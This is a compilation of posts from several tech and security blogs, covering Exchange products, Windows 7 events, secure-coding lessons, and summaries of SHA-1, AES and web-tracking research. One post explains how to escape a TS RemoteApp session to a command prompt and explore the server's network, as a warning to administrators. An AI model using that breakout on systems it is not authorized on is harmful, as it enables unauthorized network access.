Update: Adam Gaffin points to this article, pointing out that I have Google ads enabled. True. One prominent difference, of course, is that I get to choose whether ads appear on my page or not; I have some reasonable control over the ads' appearance, and I could filter out competitors if I wanted to. Autolink doesn't provide any of these features, except that it allows you to disable it. If I'm an Amazon affiliate, let's say, how do I stop Autolink from doing something nasty to Amazon links on my page? Sure, it might not do that now, but as any competitive strategist knows, you judge competitors by their capabilities, not by their intentions.
The Weblogs Inc folks covered Adomo's unveiling here (including a picture that's just begging for a caption). I suggested that the Adomo folks contact Robert Scoble before the show; their product is a natural for discussion on his blog, since it's a) MS-centric b) built with .NET and c) very, very cool. I don't know if they did, and now he's offline. However, he gave them (and everyone else) the same advice.
Bruce Schneier is reporting that the SHA-1 hash algorithm has been broken:
The research team of Xiaoyun Wang, Yiqun Lisa Yin, and Hongbo Yu (mostly from Shandong University in China) have been quietly circulating a paper describing their results:
• collisions in the the full SHA-1 in 2**69 hash operations, much less than the brute-force attack of 2**80 operations based on the hash length.
• collisions in SHA-0 in 2**39 operations.
• collisions in 58-round SHA-1 in 2**33 operations.
This attack builds on previous attacks on SHA-0 and SHA-1, and is a major, major cryptanalytic result. It pretty much puts a bullet into SHA-1 as a hash function for digital signatures (although it doesn't affect applications such as HMAC where collisions aren't important).
Now this is a surprise, and a pleasant one. Nokia announced that they're licensing Exchange ActiveSync for their Series 60 and Series 80-based phones. This is excellent news for the Exchange team; clearly their effort to get EAS more widely deployed is bearing fruit. (Nokia also licensed Flash.. just what I want on my phone, not.) Interestingly, the WIndows Mobile team has been busy at 3GSM World too; they announced that Flextronics, a large original device manufacturer (ODM), will be building "Peabody", a new, lower-cost, reference platform for Windows Mobile devices. It should be interesting to see how this plays out.
Update: it turns out that Nokia is also licensing a bunch of Windows Media technologies, including Windows Media DRM and the Media Transfer Protocol. Take that, Apple and your not-yet-shipping Motorola iTunes phone!
Today a startup named Adomo is launching their new product, Adomo Voice Messaging. They briefed me on it a month or so ago, and I've been eagerly waiting for today (the start of the DEMO 2005 conference) for the embargo to lift so I could talk about it. What they're essentially trying to do is build a comprehensive unified messaging (UM) solution that uses Exchange not just as a message store (like Cisco's Unity) but as the communications backbone. I think they're on the right track, taking what I privately label the CommVault approach: they're leveraging Exchange as much as possible, instead of building a product and trying to make it work, not very well, with multiple back ends.
The Adomo system has three parts: an appliance (running their own *NIX variant, I forget which-- maybe FreeBSD?) that handles up to 36 ports from the PBX, a connector that ties the appliance to the Exchange message store, and a really slick speech-based auto-attendant. You can chain appliances to use more than 36 ports, and Adomo's literature shows smaller 12- and 24-port appliances being used in remote offices. Adomo claims that a single 36-port appliance is enough to serve between 1800 and 3600 users, depending on usage; they're purposefully targeting organizations with more than 500 users. The appliance compresses incoming messages using the GSM codec (which means that you can listen to messages on pretty much any Windows, Mac OS X, or Linux machine-- the codec is ubiquitous, unlike Cisco's ACELP implementation) and sends them to the Exchange connector.
The Exchange connector is where the action happens: incoming messages are directed to the user's mailbox, where they appear as regular email messages. This is particularly important because it allows you to deploy their solution without any desktop changes: there are no required plugins or Outlook bits to add, and VM attachments are available on any device that can handle email attachments (including handhelds, OWA, and so on). Messages are delivered using an Exchange form that includes buttons that let you play your VM on your phone, call the sender, and take other appropriate actions; Adomo has promised tighter integration with Outlook for future versions, but the existing integration is pretty darn good.
One of Adomo's big selling points is that you don't have to touch the Exchange server or Active Directory to implement their product. You only need one connector per Exchange organization. The connector doesn't have to be on an Exchange server, and there are no AD schema changes required. You provision user accounts for voicemail by specifying the associated phone numbers, so there's no need for a separate user management tool. Adomo hasn't said which AD attributes they use, but their literature does claim that you can do all the provisioning through AD Users and Computers or through scripts.
Messages appear with Caller ID data, and the connector is smart enough to match that data against the user's Contacts folder so that messages appear with the correct sender information. That makes it easy to prioritize and handle VMs (either manually or with rules) in the same way you would any other email. In addition to the ubiquitous "message waiting" light, the connector can send SMS messages to a mobile phone or alerts (including the Caller ID number in the subject line) to BlackBerry or other non-audio-capable devices.
It's hard to do the auto-attendant justice in this form, but I'll try. When you call in, the attendant answers and plays its recorded greeting. You can speak a name at any time, and their speech recognizer will attempt to find the name in the GAL (with conflict resolution, so it can ask the user which John Smith ("John Smith in Sales, or John Smith in Engineering?") to connect to based on OU, domain, or group membership. This in itself is very cool; the cooler part is that the attendant has access to a wealth of user-specific data, including your schedule and presence data from LCS. Imagine being able to set a rule that says "if my wife calls on her cell phone, IM me to tell me; otherwise, dump all incoming calls to voicemail". From a user perspective, imagine calling a contact and having the attendant tell you "Jane's in a meeting until 3pm Central; do you want me to notify her that you're calling?" (based, of course, on Jane's decision to trust you with that information as a contact in her Contacts folder). There are almost limitless possibilities for future expansion here, particularly given that the Adomo solution can be used with SIP products (conveniently including LCS 2005).
Of course, given Adomo's target market focus, their solution won't work for everyone. First, it requires Exchange 2003. Second, they haven't released pricing data (at least to me) but since their focus is on 500-plus seat organizations, it likely won't be cheap. (One interesting note: Adomo's pitch talks about the benefits of their product for organizations that sell hosted Exchange services-- this could potentially be a nice revenue sweetener for hosting companies). However, in terms of functionality, their nearest competitor is the Wildfire service, which (last I checked) was $70-150/month/user-- so they've definitely got some pricing maneuvering room. I think their product will be successful, but I'm sure it will be interesting to see how Microsoft's announced UM support in Exchange 12 plays against Adomo's solution, which now has a year or two to get traction before E12 ships.
Interesting news: Microsoft is buying Sybari, makers of the outstanding Antigen line of anti-virus products (and some pretty good anti-spam tools, too). Interestingly, there are Antigen versions for Exchange, Live Communications Server, SharePoint, and even Domino; I expect that the breadth of their product line made them a more appealing target than some of their peers. It'll be interesting to see how this acquisition works in conjunction with MS' buy of GeCAD's RAV technology. However, it will be even more interesting to see what effect this announcement has on the second-tier AV vendors-- companies like Command and Panda have got to be sweating now. (Not to mention that many organizations who have stuck with products they don't really like will now use this as an excuse to move!)
I could snark about this filter update taking so long, but at least Microsoft's making the IMF freely available-- some messaging systems have no integrated spam filtering. Anyway, there's now a filter update for the IMF available here.
Ordinarily I wouldn't post this announcement here, but I'm going to break tradition and do so because I'm one of the conference co-chairs. As such, I have to help find speakers, so I want this call for papers to go out far and wide.
Windows IT Pro is now accepting session proposals for the Oct-Nov. 2005 Windows Connections conference. We're heading to San Diego October 30 to November 2, 2005, for the premier Windows technical conference, and we'd like to hear from you!
If you're interested in speaking on Exchange-related topics at the show, send your abstracts to paul@robichaux.net by February 18. We want proposals for regular 75-minute sessions, as well as 1/2 day and full day pre-conference and post-conference sessions.
Note that we have a limited number of speaking slots, and all participants must be able to present a minimum of three 75-minute sessions. There are three basic requirements:
Please adhere to the February 18 deadline as we need to make speaker and session selections right away. (We plan to have a conference brochure ready to distribute at TechEd in June.)
I had a very interesting phone call yesterday with an IBMer named Jim Colson. Jim actually is the chief architect responsible for the Workplace Client Technology platform, and he'd contacted me after seeing my earlier post complaining that WCT wasn't generally available to tell me that it is available. Clearly there was a disconnect if it appeared that two different parts of IBM were telling me two different things, so I was eager to get the lowdown.
Jim explained that WCT is a client middleware platform, which includes a wide range of technologies (including a managed client container, access technologies such as messaging, distributed business logic, data synchronization, and interaction technologies such as Embedded ViaVoice, and other presentation services including browser based and widget based interfaces from Eclipse). These technologies can be used to build applications on various types of embedded, mobile, desktop, laptop, and server devices. The underlying technology has been in development for about 7 years; and has been deployed in a wide range of solutions such as cars from Honda, Nokia mobile phones, laptops and tablets with Nissay, and a wide range of line-of-business apps.
WCT is currently available to customers in a variety of forms. It's already built into a number of other products, and the WCT Micro Edition SDK offers a freely downloadable set of WCT components that can be used to evaluate WCT as an app dev platform. (To be perfectly unambiguous: the SDK is for production use, but you can download it to play with.)
WCT supports building deployable assemblies of components-- think of them as packaged runtimes-- to support particular applications. The Enterprise Offering (more properly, the Workplace Client Technology, Micro Edition Enterprise Offering, or WCTME-EO) bundles the most commonly required components and middleware services for desktop and laptop-class devices into a single deployable bundle. So, mea culpa: WCTME-EO and the WCT SDK are both generally available and widely used, my earlier claims notwithstanding. Thanks Jim!
Still with me? OK, back to my previous post. Among other WCT customers, Lotus is using the WCT platform to build their own client, the Workplace Client Technology, Rich Edition. This is the actual client middle platform that I've been trying to get, and it is not generally available-- at least according to my IBM sales rep and the Lotus WCT Project Office. That's supposed to change with the release of Lotus Workplace Messaging 2.5 and Lotus Workplace Documents 2.5.
To put this in more familiar terms, my earlier post was roughly equivalent to complaining that Microsoft wouldn't let me have the .NET Framework (which is freely available and widely deployed, and for which beta/preview versions exist) when what I really wanted was Office. You can argue over whether Lotus is being forthright about exactly who can get their WCT-based clients, and under what circumstances, but the bottom line is that WCT itself is available, and that's what Jim was trying to help me understand. Now I know what specific term to use next time I complain to Ed Brill.
Here's a very cool trick: Glen Scales wrote a script that finds all of your mailbox and public folder stores, then queries their servers' event logs to find event ID 1221s indicating how much white space is available. This is a slick solution to the vexing problem of monitoring how much white space is lurking in your databases.
So in today's session at SMBNation that I spoke at, I showed how to use TS RemoteApp with TS Gateway on SBS2008 to deliver remote applications through Remote Web Workplace. It is one of the most cool features in the Windows Server 2008 operating system. But we have to remember what its doing.
Part of the conversation we had was on the difference between local desktop display in TS RemoteApp vs just having a full desktop to the Terminal Server. One issue that came up was that as a RemoteApp, you can't run other applications.
Well, that is not actually true. If you think that, then a TS RemoteApp has the ability to be an attack vector for you. What do I mean? Well below is a screen shot of what happens if you hit CTRL-ALT-ENTER with the cursor focused on the RemoteApp window (in this case MS Paint running remotely):
At this point, you can run Task Manager.... then hit File->Run and run something else. In my case, I showed a few people afterwards how to start cmd and start exploring the network. Now, you will only have the privileges of the user account logged in as, but it is still something you have to be careful about. If you think a RemoteApp bundle prevents access to other application sor the network... you are wrong.
So is this bad? No. Is it really an attack vector? No. You just need to understand that when allowing ANY type of Terminal Services based access, you have to restrict the policies and access accordingly. No matter if its local or remote. Running a TS RemoteApp bundle of Office will display on the local desktop, but is STILL running on the Terminal Server. So it will be browsing the network the Terminal Server is connected to as the local net. It will also browse your own drives mapped via tsclient. So you have to remember that.
Hope thats useful. A TS RemoteApp bundle does NOT mean you won't have access to the TS desktop when displaying remotely on your personal desktop. And that's not a bad thing. TS Remote App is a convenient way to extend the workspace to your local machine, anywhere in the world. No pun intended. That's its power... and the benefit. Great remote productivity enhancement in Windows Server 2008. Use it. (Safely of course)
It's only a few days away. The official launch of Windows 7 is here!
And of course, that means its time to party!!! You may have heard about the Windows 7 House Parties that are being thrown all around the world. Basically thousands of small groups of people are getting together to see what Windows 7 can do.
Personally, I thought we needed to do more. So fellow MVP and friend Charlie Russel and I decided we would throw our own party. But focused on IT pros and not the consumer angle. We plan to have a lot of fun, showing the cool features of Windows 7 for IT pros like BitLocker, AppLocker and DirectAccess. We plan to bring a bunch of laptops and show new shell extensions, Powershell, new multitouch features and basically sit around and enjoy hours of Q&A for those that haven't tried it yet. We are even planning on installing Windows 7 on a guest's Macbook to show how well it does using Bootcamp on Apple hardware and even on small netbooks.
I also wanted to send a message out to the Vancouver IT community to clear up some misconceptions. This is a party hosted by Charlie and myself. This is NOT a Microsoft event. Microsoft was gracious enough to let us use their facility and even sprung for some of the cost for pizza. However, they never planned this out. Nor did the local VanTUG and VanSBS groups.
Our party is an INVITATION ONLY event. Because we are limited in our own budget and constrained in where we could have the party... we only have enough room for 75 people. So we could only allow a certain number of our friends to come. Charlie and I decided the best way to handle this would be to simply invite who we wanted, and then open it to our friends at the local user groups on a first come, first served basis. This is why there is a cap on the registration on the event, and why it booked up so quickly.
I am hearing through the grapeline that there is a LOT of descent in the Vancouver IT community who feel that Microsoft, VanTUG and VanSBS did a poor job organizing this. >LET ME BE CLEAR. This is a personal party that Charlie and I organized. If you were lucky enough to get an invitation and registered, great. But if you didn't, don't take it out on Microsoft, the local usergroups or their leaders. It's not their fault!!!
We are using our own money and time to throw this party. Please be considerate and respect that we couldn't invite all of you. I am happy to see there is so much excitement about Windows 7 and that you wanted to party with us. And I am sorry if you feel it isn't fair that you didn't get invited. Please feel free to share your own Windows 7 experience, and host your own party. We may be the only IT pro party during the Windows 7 launch, but nothing says you can't have your own!
So party on. Welcome to a new world. Welcome to Windows 7!
Hey guys. I noticed Twitter is a buzz with a few podcast interviews I did on RunAs Radio lately. I thought I will post the links for those of you who don't follow such tweets.
There were two interviews I did last month:
The first interview was discussion on free tools available for network monitoring and diagnostics. The second was some in depth discussion on using DirectAccess with Windows 7 and Windows Server 2008 R2. I do hope you find both interviews fun and useful.
Enjoy!
So this week my buddy Charlie and I threw a Windows 7 party for the IT pro community in Vancouver, BC at the Microsoft office.
The office could only handle 80 people, and we simply had to turn people away. Sorry to those who weren't allowed to come. Many people came early, and hung out in the hallway even before they were allowed in.
With almost a 100 people in that hallway just out of the elevator, that hall was WARM. I felt bad for some of the people as you could tell they were overheating. But we weren't ready to let them in as we set up the rooms with different Windows 7 systems.
When we did open the doors it was a mad rush for everyone to get in where it was cooler and they could grab a cold one and cool down. Thankfully everyone was patient and polite. Thanks to everyone for that!
Once they got in, there were several different rooms that they could go hang out in. In one room, Charlie had brought a HP Media Touchsmart so people could experience the new multi touch functionality of Windows 7. Kerry Brown, a fellow MVP with experience in Windows shell, stayed in the room teaching people all the new shell features like Libraries, Jump Lists etc, and I am told schooled some admins on the nitty gritty of Power Shell. Good job Kerry! Thanks for helping out!!!
It was interesting as everytime I looked in that room, people were surrounded around the device playing with the TouchPack games and with Virtual Earth. It was interesting to hear my buddy Alan comment that his experience on his iPhone with multitouch, especially with Google Earth, was far superior to what he was seeing there. Maybe that is something Microsoft can take away from that. Of course, big difference on a 24 inch monitor and a small iPhone screen. But the point is well taken.
We had the biggest crowds when we did demos in the main presentation room. When I was presenting on DirectAccess security I had my good friend Roger Benes (a Microsoft FTE) demonstrate how Microsoft used DirectAccess themselves. Using the Microsoft guest wireless he connected seamlessly to Microsoft's corpnet, which allowed us to demonstrate the policy control and easy of use of the technology. I am told a lot of people enjoyed that session, with several taking that experience back to their own office to discuss deployment. Thats always good to hear.
Charlie impressed the crowd showing how to migrate from Windows XP and Vista to Windows 7. He demonstrated Windows Easy Transfer and Anytime Upgrades and took the time to explain the gotchas in the experience. He even had me demonstrate XP mode on my laptop so people could see how they could maintain application compatibility with a legacy Windows XP virtualized on Windows 7.
Of course, I had a lot of fun hanging out in the far back room. I got to demonstrate some of the security stuff built into Windows 7 like BitLocker, AppLocker and BitLocker to Go. I was even asked about Parental Controls which I couldn't show on my laptop since its domain joined, but was able to show on a demo box Roger had brought for people to play with.
Some of the more interesting things I helped facilitate was asking my buddy Alan to bring his Macbook in. He is a great photographer who works with Linux and OSX a fair bit, on top of using Windows. Actually, all the photos you see in this post were taken by him. Thanks for sharing them Alan!
Anyways, I convinced him to let us use his Macbook to install Windows 7. He reluctantly agreed, as you can see from the picture below when he was looking at the Snow Leopard and Windows 7 media together. :-)
We had a fair number of people crowd around his Macbook as he went through the process of installing Bootcamp and deploying Windows 7. Interestingly enough, it flawlessly converted that Apple hardware into a powerful Windows 7 system in about 20 minutes.
Charlie and I were REALLY busy. We had presented on different sessions in different rooms throughout the night. Actually, I very rarely even saw him except for a few times when he called me in to help out with a demo. Sorry we couldn't party more together Charlie. And my apologies to those that were looking forward to our traditional "Frick and Frack" show where we banter back and forth.
Many of you may not know that outside of computers, I am an avid indie filmmaker. Actually, that is giving me too much credit. I am an amateur cinematographer at best, who had high hopes that I would get a chance to film everyone's impressions throughout the party. Unfortunately, I was so busy presenting, I had almost NO TIME to get any film recorded. *sigh* Alan did get a snap of a rare moment when I actually caught someone on film.
Of course I can't complain too much. I had a great time getting to show all the neat features in Windows 7, and answering the tonnes of questions that people had.
Of course, when the night finally wound down, it was nice to close out the party and watch the Vancouver skyline change. When we were done, we had the opportunity to hang with our IT friends in Vancouver and bring in the birth of Windows 7.
I have several people I would like to thank for making the evening possible. Charlie and I couldn't have done it without the support of people like Graham from VanTUG, Jas from VanSBS and Roger from Microsoft. Speaking of Microsoft, I have to give a shout out to Sim, Sasha and Ljupco in the MVP team who helped us get through all the red tape to throw the party at Microsoft's office. And many thanks to Brent, Alan and Kerry for helping us out throughout the event. My thanks to all of you.
I hope everyone had a good time. And if anything, Charlie and I hope you learned something that will help you deploy and use Windows 7 in your organizations. Happy birthday Windows 7. Welcome to a new world without walls!
P.S. All the pictures you see here were taken by Alan and used with his permission. You can check out some of his other amazing work at bailwardphotography.com.
So recently Microsoft banned memcpy() from their SDL process, which got several of us talking about perf hits and the likes when using the replacement memcpy_s, especially since it has SAL mapped to it. For those that don't know, SAL is the "Standard Annotation Language" that allows programmers to explicitly state the contracts between params that are implicit in C/C++ code. I have to admit its sometimes hard to read SAL annotations, but it works extremely well to be able to help compilers know when things won't play nice. It is great for static code analysis of args in functions, which is why it works so sweet for things like memcpy_s()... as it will enforce checks for length between buffers.
Anyways, during the discussion Michael Howard said something that had me fall off my chair laughing. And I just had to share it with everyone, because I think it would make a great tshirt in the midst of this debate:
Oh, I'm thinking of banning zero's next - so we can no longer have DIV/0 bugs! Waddya think?
OK.. so its a Friday and that is funny to only a few of us. Still great fun though.
Have a great long weekend! (For you Canadian folks that is)
OK, so anyone who knows me expects that I stay up on the bleeding edge when it comes to dev tools and operating systems. Yes, I have been using Windows 7 for almost a year now and have been loving it. However, I never ran it on my production dev environment as I felt I did not what to disrupt our software development workflow until Windows 7 was in final release. With it out to RTM now, I felt it was as good as time as any to migrate, especially since we recently released our latest build of our own product and have a bit of time to do this.
So last week I deployed Windows 7 to both of my production dev systems, as well as the primary QA lab workstations. It was the worst thing I could ever have done, halting all major development and test authoring in our office due to a MAJOR gotcha Microsoft failed to let us know about during the beta and RC.
Ready for this....
You cannot run Virtual PC 7 (beta) in Windows 7 WITHOUT hardware virtualization. OK, I can live with that, since the new XP mode (which is an excellent feature) may very well need it. That didn't concern me. It was my fall back that failed to work that blew my mind...
You cannot run Virtual PC 2007 in Windows 7, as they have a hard block preventing it from being installed on Windows 7 due to compatibility issues. So the same machine that I have been using for development using Vista for a few years has now become a glorified browsing brick. I cannot do any of my kernel mode and system level development or debugging as I am not ALLOWED to install Virtual PC 2007 on the same hardware that worked before. *sigh*
What surprised me is that Ben, the Virtual PC Guy at Microsoft blogged that it was possible to run Virtual PC on Windows 7, and in his own words:
While all the integration aspects of Virtual Machine Additions work (mouse integration, shared folders, etc...) there is no performance tuning for Windows 7 at this stage - so for best performance you should use a system with hardware vitalization support.
That sounds to me like it will still work without hardware virtualization. Seems that is not the case.
Since Windows 7 is already to RTM, if this is a block due to Windows, it isn't going to be fixed anytime soon. So hopefully they can do something in the Virtual PC side of the equation, or they are going to disappoint a lot of unknowing developers.
This just became a MAJOR blocking issue for many dev shops that are using Virtual PC for isolated testing.
If this concerns you, then I recommend you download Intel's Processor Identification Utility so you can check to see if your dev environment is capable of running hardware virtualization.
Failing to do so might get you stuck like I did, now having me decide if I want to degrade back to Windows Vista just to get work done. There goes another day to prep my main systems again. *sigh*
UPDATE: Fellow MVP Bill Grant has provided me a solution to my delimma. It appears the issue is because Virtual PC 7 (beta), a built in component for Windows 7 when installed, is causing the blocking issue. By going into "Turn Windows features on or off" and removing Virtual PC support (and effectively removing XP mode support), Virtual PC 2007 can then be installed on machines that do not have hardware virtualization support.
This isn't the most optimal behaviour, but acceptable. Since without VT support in my CPU I can't use XP mode anyways, removing it does not limit WIndows 7 from functioning. I have reported to Microsoft on this odd behaviour since:
So if you do NOT have VT support in your CPU, please uninstall Virtual PC 7 support if you installed it. VPC 2007 will then properly install for you.
So Susan has been on my case about Twitter for some time now. In a recent round table we were recording she "beat me up" about it, and tonight on IM we had a good discussion about the REAL vs PERCEIVED risks in Twitter.
Susan's biggest complaint is that security minded individuals shouldn't be blindly recommending the use of Twitter without educating the user on 'safe-twittering'. I would say that same logic exists for setting up web pages, blogs and the use of social networking sites like Facebook.
She stepped that up a bit tonight when she blogged her discomfort in the fact the RSA Conference was recommending Twitter as well.
So in an effort to stop spreading the FUD about Twitter insecurity, I wanted to share some of my thoughts through a quick set of safe twittering rules.
Look, Twitter is addictive. Simple. Short. Fast. A great way to see the thoughts of others you might care about. Ultimately though... like any other Internet based technology it has the potential to be abused... and put you at risk. No different than websites or blogs.
So be careful. Follow these rules and enjoy the conversation!
So John Bristowe, Developer Evangelist for Microsoft Canada will be hosting a Coffee and Code event in Vancouver tomorrow from 9 to 2 at Wicked Cafe. Come join him and fellow Microsoft peers Rodney Buike and Damir Bersinic as they sit and share their knowledge over a cup of joe.
I will be there too, and will be available if anyone wants to talk about secure coding, threat modeling with the SDL TM or if you want to talk about integrating AuthAnvil strong authentication into your own applications or architectures
I do hope to see some of you there. And if I don't... I will be seeing you at #energizeIT right?
What: Coffee and Code in Vancouver
When: April 8th, 2009 from 9am - 2pm
Where: Wicked Cafe - 861 Hornby Street (Vancouver)
So have you ever tried to restrict access to your applications in a way so that you can maintain least privilege?
I do. All the time. And recently it blew up in my face, and I want to share my experience so others can learn from my failure.
Let me show you a faulty line of code:
if( principal.IsInRole( "Administrators" ) )
Seems rather harmless doesn't it? Can you spot the defect? Come on... its sitting right in the subject of this post.
Checking to see if the current user is in the "Administrators" group is a good idea. And using WindowsPrincipal is an appropriate way to do it. But you have to remember that not EVERYONE speaks English. In our particular case, we found a customer installed our product using English, but had a user with a French language pack. Guess what... the above code didn't work for them. Why? Because the local administrators group is actually "Administrateurs".
The fix is rather trivial:
SecurityIdentifier sid = new SecurityIdentifier( WellKnownSidType.BuiltinAdministratorsSid, null );
if (principal.IsInRole(sid))
By using the well known SID for the Administrators group, we ensure the check regardless of the name or language used.
Lesson learned the hard way for me. We have an entire new class of defect we are auditing for, which we have found in several places in our code. it always fails securely, NOT letting them do anything, but that's not the point. It is still a defect. Other accounts we weren't considering were "Network Service" (its an ugly name on a German target) and "Guest". Just to name a few.
Hope you can learn from my mistake on that one. That's a silly but common error you may or may not be considering in your own code.
I have had the pleasure over the past few months to spend some time playing with an early rendition of " Elevation of Privilege: The Threat Modeling Game". According to Adam, "Elevation of Privilege is the easiest way to get started threat modeling". I couldn't agree more. If you have a team that is new to the whole process of threat modeling, you will want to check it out. If you are at RSA this week, drop by the Microsoft booth and pick the game up for free. If you aren't, you can download it here.
EoP is a card game for 3-6 players. The deck contains 74 playing cards in 6 suits: one suit for each of the STRIDE threats (Spoofing, Tampering, Repudiation, Information disclosure, Denial of Service and Elevation of Privilege). Each card has a more specific threat on it. You can see a short video on how to play and some more information about the game by checking our Adam's post here. In the end, it is a game that makes it possible to have more fun when thinking about threats. And that's a good thing.
Even more impressive is that they have released the game under Creative Commons Attribution license which gives you freedom to share, adapt and remix the game. So you if you feel you can improve up this, step up and let everyone know!!
Congratulations to the SDL team at Microsoft for creating an innovative way to approach the concept of threat modeling.
It's almost time for a deluge of "Ten Years After 9/11" essays. Here's Steven Pinker:
The discrepancy between the panic generated by terrorism and the deaths generated by terrorism is no accident. Panic is the whole point of terrorism, as the root of the word makes clear: "Terror" refers to a psychological state, not an enemy or an event. The effects of terrorism depend completely on the psychology of the audience.[...]
Cognitive psychologists such as Amos Tversky, Daniel Kahneman, Gerd Gigerenzer, and Paul Slovic have shown that the perceived danger of a risk depends on two factors: fathomability and dread. People are terrified of risks that are novel, undetectable, delayed in their effects, and poorly understood. And they are terrified about worst-case scenarios, the ones that are uncontrollable, catastrophic, involuntary, and inequitable (that is, the people exposed to the risk are not the ones who benefit from it).
These psychologists suggest that cognitive illusions are a legacy of ancient brain circuitry that evolved to protect us against natural risks such as predators, poisons, storms, and especially enemies. Large-scale terrorist plots are novel, undetectable, catastrophic, and inequitable, and thus maximize both unfathomability and dread. They give the terrorists a large psychological payoff for a small investment in damage.
[...]
Audrey Cronin nicely captures the conflicting moral psychology that defines the arc of terrorist movements: "Violence has an international language, but so does decency."
Nice essay by Christopher Soghoian on why cell phone and Internet providers need to enable security options by default.
Really interesting research.
Search-redirection attacks combine several well-worn tactics from black-hat SEO and web security. First, an attacker identifies high-visibility websites (e.g., at universities) that are vulnerable to code-injection attacks. The attacker injects code onto the server that intercepts all incoming HTTP requests to the compromised page and responds differently based on the type of request: Requests from search-engine crawlers return a mix of the original content, along with links to websites promoted by the attacker and text that makes the website appealing to drug-related queries.
- Requests from users arriving from search engines are checked for drug terms in the original search query. If a drug name is found in the search term, then the compromised server redirects the user to a pharmacy or another intermediary, which then redirects the user to a pharmacy.
- All other requests, including typing the link directly into a browser, return the infected website's original content.
- The net effect is that web users are seamlessly delivered to illicit pharmacies via infected web servers, and the compromise is kept hidden from view of the affected host's webmaster in nearly all circumstances.
Upon inspecting search results, we identified 7,000 websites that had been compromised in this manner between April 2010 and February 2011. One quarter of the top ten search results were observed to actively redirect to pharmacies, and another 15% of the top results were for sites that no longer redirected but had previously been compromised. We also found that legitimate health resources, including authorized pharmacies, were largely crowded out of the top results by search-redirection attacks and blog and forum spam promoting fake pharmacies.
And the paper.
A couple of weeks ago Wired reported the discovery of a new, undeletable, web cookie:
Researchers at U.C. Berkeley have discovered that some of the net’s most popular sites are using a tracking service that can’t be evaded -- even when users block cookies, turn off storage in Flash, or use browsers’ “incognito” functions.
The Wired article was very short on specifics, so I waited until one of the researchers -- Ashkan Soltani -- wrote up more details. He finally did, in a quite technical essay:
What differentiates KISSmetrics apart from Hulu with regards to respawning is, in addition to Flash and HTML5 LocalStorage, KISSmetrics was exploiting the browser cache to store persistent identifiers via stored Javascript and ETags. ETags are tokens presented by a user’s browser to a remote webserver in order to determine whether a given resource (such as an image) has changed since the last time it was fetched. Rather than simply using it for version control, we found KISSmetrics returning ETag values that reliably matched the unique values in their 'km_ai' user cookies.
"Biclique Cryptanalysis of the Full AES," by Andrey Bogdanov, Dmitry Khovratovich, and Christian Rechberger.
Abstract. Since Rijndael was chosen as the Advanced Encryption Standard, improving upon 7-round attacks on the 128-bit key variant or upon 8-round attacks on the 192/256-bit key variants has been one of the most difficult challenges in the cryptanalysis of block ciphers for more than a decade. In this paper we present a novel technique of block cipher cryptanalysis with bicliques, which leads to the following results:
- The first key recovery attack on the full AES-128 with computational complexity 2126.1.
- The first key recovery attack on the full AES-192 with computational complexity 2189.7.
- The first key recovery attack on the full AES-256 with computational complexity 2254.4.
- Attacks with lower complexity on the reduced-round versions of AES not considered before, including an attack on 8-round AES-128 with complexity 2124.9.
- Preimage attacks on compression functions based on the full AES versions.
In contrast to most shortcut attacks on AES variants, we do not need to assume related-keys. Most of our attacks only need a very small part of the codebook and have small memory requirements, and are practically verified to a large extent. As our attacks are of high computational complexity, they do not threaten the practical use of AES in any way.
This is what I wrote about AES in 2009. I still agree with my advice:
Cryptography is all about safety margins. If you can break n round of a cipher, you design it with 2n or 3n rounds. What we're learning is that the safety margin of AES is much less than previously believed. And while there is no reason to scrap AES in favor of another algorithm, NST should increase the number of rounds of all three AES variants. At this point, I suggest AES-128 at 16 rounds, AES-192 at 20 rounds, and AES-256 at 28 rounds. Or maybe even more; we don't want to be revising the standard again and again.And for new applications I suggest that people don't use AES-256. AES-128 provides more than enough security margin for the forseeable future. But if you're already using AES-256, there's no reason to change.
The advice about AES-256 was because of a 2009 attack, not this result.
Again, I repeat the saying I've heard came from inside the NSA: "Attacks always get better; they never get worse."
A prison in Brazil uses geese as part of its alarm system.
There's a long tradition of this. Circa 400 BC, alarm geese alerted a Roman citadel to a Gaul attack.